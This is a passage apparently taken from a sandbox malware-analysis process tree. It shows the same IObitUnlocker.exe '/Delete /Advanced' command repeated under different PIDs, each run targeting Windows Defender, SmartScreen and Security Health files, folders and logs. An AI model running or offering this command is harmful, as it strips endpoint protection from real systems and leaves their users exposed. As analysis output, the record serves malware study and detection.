ll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3392
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7072
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:6948
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6312
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6372
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6284
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:6336
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7136
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6848
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2616
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:6916
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat 